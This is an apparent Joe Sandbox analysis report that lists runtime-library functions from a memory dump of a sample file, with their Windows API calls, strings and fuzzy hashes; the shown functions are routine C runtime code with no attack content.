Opcode Fuzzy Hash: 16a49c5c15166c08dc0febc7916ab5e2fa1f81e0fc1737e7899f668072301457
Instruction Fuzzy Hash: 9E51B571A202169BEF24DFA4DC45ABA77B8FF08701F054065FD14E7194DBB0DE288B65

Function 0025D7A2 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00253E60: GetLastError.KERNEL32(?,00000008,0025A6B1,00000000,0024B2C0), ref: 00253E64
Part of subcall function 00253E60: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF), ref: 00253F06

GetACP.KERNEL32(?,?,?,?,?,?,00251F39,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0025D863
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00251F39,?,?,?,00000055,?,-00000050,?,?), ref: 0025D88E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0025D9F1

Strings

utf8, xrefs: 0025D960

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 6706e2eef520ff185f2bc883a647f9c9eb496f4e258616a884749c0d990fc0be
Instruction ID: 0b16a43bd9ab129229ae18b5c355a0d0380eb0e550a9630d6d832b5f023905a5
Opcode Fuzzy Hash: 6706e2eef520ff185f2bc883a647f9c9eb496f4e258616a884749c0d990fc0be
Instruction Fuzzy Hash: 44714671630203AADB34AF35CC46BA7B3A8EF45716F144429FD05D7181FA70ED698BA8

Function 00258484 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00258511

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: e62bf9f7c864d3f4a84d5b345bca12da4174e8a1b17754eb5299086a5322faff
Instruction ID: 190292da41c9497c651342aff6dc4588b22cbead920290db563d1992eb385c10
Opcode Fuzzy Hash: e62bf9f7c864d3f4a84d5b345bca12da4174e8a1b17754eb5299086a5322faff
Instruction Fuzzy Hash: EEB16B329202469FDB15CF68C8817FEFBA5EF59301F258166EC01BB241DAB4DD29CB64

Function 002473CB Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002473D7
IsDebuggerPresent.KERNEL32 ref: 002474A3
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002474BC
UnhandledExceptionFilter.KERNEL32(?), ref: 002474C6

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 4dccc5994c725e719db8ce3a236de8cf8c878e0758f93f5452cfc7ece116182c
Instruction ID: 87114d936faf9ee079ba3727eb6469cff7a463087c6607828794e682b043d0aa
Opcode Fuzzy Hash: 4dccc5994c725e719db8ce3a236de8cf8c878e0758f93f5452cfc7ece116182c
Instruction Fuzzy Hash: 7E310A75D15229DBDF24EF64D949BCDBBB8AF08300F1041EAE51CAB250E7719A84CF45

Function 00260E89 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 00260B42: CreateFileW.KERNEL32(?,00000000,?,00260F32,?,?,00000000,?,00260F32,?,0000000C), ref: 00260B5F

GetLastError.KERNEL32 ref: 00260F9D
__dosmaperr.LIBCMT ref: 00260FA4
GetFileType.KERNEL32(00000000), ref: 00260FB0
GetLastError.KERNEL32 ref: 00260FBA
__dosmaperr.LIBCMT ref: 00260FC3
CloseHandle.KERNEL32(00000000), ref: 00260FE3
CloseHandle.KERNEL32(0025A195), ref: 00261130
GetLastError.KERNEL32 ref: 00261162
__dosmaperr.LIBCMT ref: 00261169

Strings

H, xrefs: 002610EE

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: d2270c9b456f1805f961a42834ab5ac02196dca3b5e9b9e9476256713481a800
Instruction ID: be8bde165358f19c23994e81e204dc10ba4c4e0f155cb3b80cb99c8ee8d7f9cd
Opcode Fuzzy Hash: d2270c9b456f1805f961a42834ab5ac02196dca3b5e9b9e9476256713481a800
Instruction Fuzzy Hash: CAA15632A241559FCF19AF68DC82BAE7BA1AB47310F180159F8019F2D1CB71ACB2DB51

Function 0024A058 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 303COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0024A177
___TypeMatch.LIBVCRUNTIME ref: 0024A285
CallUnexpected.LIBVCRUNTIME ref: 0024A3F2

Strings

8S&, xrefs: 0024A16E
csm, xrefs: 0024A1AE
csm, xrefs: 0024A102
csm, xrefs: 0024A095

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: 8S&$csm$csm$csm
API String ID: 1206542248-3855715068
Opcode ID: 79f1f417d12be7835ee10019ada17bada0411a543ffde6ce49dbea4b2485d908
Instruction ID: 6d0a24708c47b727846217bffe8daa70cb1439f600889cc0dcd95f6a2c772cd1
Opcode Fuzzy Hash: 79f1f417d12be7835ee10019ada17bada0411a543ffde6ce49dbea4b2485d908
Instruction Fuzzy Hash: 1EB16C7186020ADFCF2DDFA4C9819AEBBB5FF14310F14419AE8156B212D771DA61CF92

Function 00257AEF Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

, xrefs: 00257D68

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 0d8ef99e00df08c595daeb2ece51b3dd187b300bc36f6edc3c410f0648b6c57d
Instruction ID: fa9548af6324a019f03f01b8a98f3ccddf891af8083581f2a1c6f6872b3d5b89
Opcode Fuzzy Hash: 0d8ef99e00df08c595daeb2ece51b3dd187b300bc36f6edc3c410f0648b6c57d
Instruction Fuzzy Hash: 14B16A70A68246AFDB15CFA9E841BBDBBB5BF45301F148094EC009B391CBB09D69CF64

Function 00255326 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00255433,?,?,00000000,00000000), ref: 002553E7

Strings

ext-ms-, xrefs: 00255391
api-ms-, xrefs: 0025537D

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: fac559ba5a05d8e04ac9b39104070583a2682911441f2f534f4c6264843d8ddd
Instruction ID: 9ccda4aa984dd7b950ba7064f9d87efa1c415bd11cafd2db8db35ce4611e3790
Opcode Fuzzy Hash: fac559ba5a05d8e04ac9b39104070583a2682911441f2f534f4c6264843d8ddd
Instruction Fuzzy Hash: 0B210D31A21A31BBCB22AF60EC54A5A37AC9F427F1F254550FD4AAB290D7F0ED14C6D4

Function 00245DA3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00245DAA
std::_Lockit::_Lockit.LIBCPMT ref: 00245DB5
std::_Lockit::~_Lockit.LIBCPMT ref: 00245E23

Part of subcall function 00245F06: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00245F1E

std::locale::_Setgloballocale.LIBCPMT ref: 00245DD0
_Yarn.LIBCPMT ref: 00245DE6

Strings

u:$, xrefs: 00245DF2, 00245E16

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID: u:$
API String ID: 1088826258-3033614593
Opcode ID: 86849b9c3ff39c771f177f0f2746aa4d1e1993ef7af6e6e729891df31cd2b37f
Instruction ID: da19736500a674c87aaa27210fc178ad434aa6f020d0bfb69e26a6746effff6f
Opcode Fuzzy Hash: 86849b9c3ff39c771f177f0f2746aa4d1e1993ef7af6e6e729891df31cd2b37f
Instruction Fuzzy Hash: 8801DF756209318BC70AEF21E89563C7B65FF86740F154049E8425B382DF34AE62CFC2

Function 00251545 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,002639F8,000000FF,?,002514D5,?,?,002514A9,00000000), ref: 0025157A
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,00000000,002639F8,000000FF,?,002514D5,?,?,002514A9,00000000), ref: 0025158C
FreeLibrary.KERNEL32(00000000,?,00000000,002639F8,000000FF,?,002514D5,?,?,002514A9,00000000), ref: 002515AE

Strings

u:$, xrefs: 0025159D
mscoree.dll, xrefs: 00251573
CorExitProcess, xrefs: 00251584

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll$u:$
API String ID: 4061214504-3365302051
Opcode ID: f45af1a9d0ecc05e61ec71942aed7bf01293aaa33aee9516c3d8cfeab8aa3640
Instruction ID: 4147fca320e0de52f4cea0af48634dbb8fd6251ce398cf3e717eb4e8178d4c53
Opcode Fuzzy Hash: f45af1a9d0ecc05e61ec71942aed7bf01293aaa33aee9516c3d8cfeab8aa3640
Instruction Fuzzy Hash: 22012631964225EFDB129F40EC0DFAEBBB8FB05B15F004225FC12A22D0EBB49914CA40

Function 0024659B Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 002465E4
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0024664F
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024666C
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 002466AB
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024670A
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0024672D

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: ce2a88b86d9fc52a0b2c55654e195d9da90fba1e0f1afbf91a00c613950ff544
Instruction ID: c0c26b9e96ce6254fb4bd6f97a4359c461291498f3c605de30b8ec8d6be3a7bf
Opcode Fuzzy Hash: ce2a88b86d9fc52a0b2c55654e195d9da90fba1e0f1afbf91a00c613950ff544
Instruction Fuzzy Hash: 2951D372920216AFEF289F54DC4CFABBBA9EF46744F154029F900E6150D774CC20CB91

Function 00249CEA Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00249CE1,0024840A,002475A8), ref: 00249CF8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00249D06
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00249D1F
SetLastError.KERNEL32(00000000,00249CE1,0024840A,002475A8), ref: 00249D71

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e9d00a773a4dabbe7956eb1cff9cf0926d9308483ad22071b0bc82e83621d4ee
Instruction ID: 7f0e805b953c175bd21b109fc3d020abec747dbfbc24e3c65e15d1210c9e4d98
Opcode Fuzzy Hash: e9d00a773a4dabbe7956eb1cff9cf0926d9308483ad22071b0bc82e83621d4ee
Instruction Fuzzy Hash: D401283653F7129DA72E3BB5BC8552B3B48EB03734B30122AF110491E0EF525CA1D540

Function 00249E01 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00249EC8
___AdjustPointer.LIBCMT ref: 00249EEB
___AdjustPointer.LIBCMT ref: 00249F87

Strings

u:$, xrefs: 00249E60

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: AdjustPointer
String ID: u:$
API String ID: 1740715915-3033614593
Opcode ID: a300e3c94aa753141e87634edb3722151db52199ecf3adc6277862b78b5ba39a
Instruction ID: c6915a7d15a751be8616e2265c740ee8399e78e317a5e47621aedf76e4f23a9c
Opcode Fuzzy Hash: a300e3c94aa753141e87634edb3722151db52199ecf3adc6277862b78b5ba39a
Instruction Fuzzy Hash: D851DE72620606EFEB2D8F14D841B7BB7A4EF44710F15452EE8058BA91E775ECE4CB90

Function 00249AF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00249B2F
__IsNonwritableInCurrentImage.LIBCMT ref: 00249BE3

Strings

u:$, xrefs: 00249BFC
csm, xrefs: 00249BCD

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm$u:$
API String ID: 3480331319-3380186878
Opcode ID: f6c304f591ff5b19dacd0d3b620483d7c1004435d6a09ce0b32bea014bc11f51
Instruction ID: fa496b6853b27c9981acda4db83c653bb6e8254f50ed3fac3d660905df1e8b57
Opcode Fuzzy Hash: f6c304f591ff5b19dacd0d3b620483d7c1004435d6a09ce0b32bea014bc11f51
Instruction Fuzzy Hash: CF410330A202199FCF04DF69D884A9FBBB1FF45328F148099E8145B392C771EAA1CF91

Function 00247E2C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(E06D7363,00000001,00000003,Q<$,?,00000000,?,?,00243C51,00000000,0026CFA4,00000000), ref: 00247E8C

Strings

u:$, xrefs: 00247E5C
Q<$, xrefs: 00247E79, 00247E7C
Q<$, xrefs: 00247E37

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: ExceptionRaise
String ID: Q<$$Q<$$u:$
API String ID: 3997070919-2764204758
Opcode ID: 3af0a55d87158a1f14f7fa381f49d8aef7b9447312f2d4ad16c7c9ae7300be52
Instruction ID: 530fe07bec86b92cf45c972266f07f8fc62e17841bc5d53b94d6dd154c7107be
Opcode Fuzzy Hash: 3af0a55d87158a1f14f7fa381f49d8aef7b9447312f2d4ad16c7c9ae7300be52
Instruction Fuzzy Hash: 5A01F731A002099FCB059F58D844B9EBBB9FF44700F054199EA149B350D770DD00CBD0

Function 0024AE32 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0024ADE3,00000000,00000000,?,?,?,?,0024AF0D,00000002,FlsGetValue,00265DE0,FlsGetValue), ref: 0024AE3F
GetLastError.KERNEL32(?,0024ADE3,00000000,00000000,?,?,?,?,0024AF0D,00000002,FlsGetValue,00265DE0,FlsGetValue,00000000,?,00249D9D), ref: 0024AE49
LoadLibraryExW.KERNEL32(?,00000000,00000000,00265DE0,FlsGetValue,00000000,?,00249D9D), ref: 0024AE71

Strings

api-ms-, xrefs: 0024AE56

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 78554d7500e7d930ba42e11cc424396c9c6fbcc13ac61cfaba63668eb4dfc50c
Instruction ID: f09f6eb6bc95732d24104462e37664d27842f5fb13e25047239a79a225e36ede
Opcode Fuzzy Hash: 78554d7500e7d930ba42e11cc424396c9c6fbcc13ac61cfaba63668eb4dfc50c
Instruction Fuzzy Hash: 38E048743D0615B7DF242F70FC0AB1A3E599F10B50F104030FB4DA40E1E7A299609589

Function 0025600A Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,00000000), ref: 0025606D

Part of subcall function 0025A759: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00259E36,?,00000000,-00000008), ref: 0025A805

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002562C8
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00256310
GetLastError.KERNEL32 ref: 002563B3

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 88051e3a42efdfd6eb8228b772e733f3dd00f2db96b7d1f485de43401ef55fd9
Instruction ID: 120c21b873c8e92f95c169c08d7f16d0c1a3b6d82b1c2993583f6347998672b8
Opcode Fuzzy Hash: 88051e3a42efdfd6eb8228b772e733f3dd00f2db96b7d1f485de43401ef55fd9
Instruction Fuzzy Hash: F9D1BB75E10259AFCF05CFA8D884AADBBB5FF08300F18816AE856EB351DB30A855CF54

Function 0025AB75 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0025A759: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00259E36,?,00000000,-00000008), ref: 0025A805

GetLastError.KERNEL32 ref: 0025ABD9
__dosmaperr.LIBCMT ref: 0025ABE0
GetLastError.KERNEL32(?,?,?,?), ref: 0025AC1A
__dosmaperr.LIBCMT ref: 0025AC21

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 31042a6598bb4c687ee26d812daa47199fcf3051ae6b28e6c1ef3b4171f6ceca
Instruction ID: e5927199b7e3a63b6ea20a2003920cf1315ad2b0f9613514c618b8ff23f49d6e
Opcode Fuzzy Hash: 31042a6598bb4c687ee26d812daa47199fcf3051ae6b28e6c1ef3b4171f6ceca
Instruction Fuzzy Hash: 7E21077123020AAFCB21AF61CC82C2BB7A9FF54366700862AFC1887140D770EC348F99

Function 0025062A Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2681168499.0000000000241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00240000, based on PE: true

Associated: 00000009.00000002.2681150053.0000000000240000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681192038.0000000000264000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681209165.000000000026F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2681290898.000000000034F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_240000_zxcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d20e82d5faa88f8203e517b6b1d8ee39d0684943947f9ec96aeeeb21f29b6db
Instruction ID: 83c012fdfe05e4378f4b0825e9ccafd118b166e8db9ddfa64c72c3bf821e3ada
Opcode Fuzzy Hash: 4d20e82d5faa88f8203e517b6b1d8ee39d0684943947f9ec96aeeeb21f29b6db
Instruction Fuzzy Hash: 0621A131620206AFDB20AF619DC096BB7ACEF84366B144525FC1897151D770EC34CFA8

Function 0025BB24 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0025BB2C

Part of subcall function 0025A759: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00259E36,?,00000000,-00000008), ref: 0025A805

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0025BB64
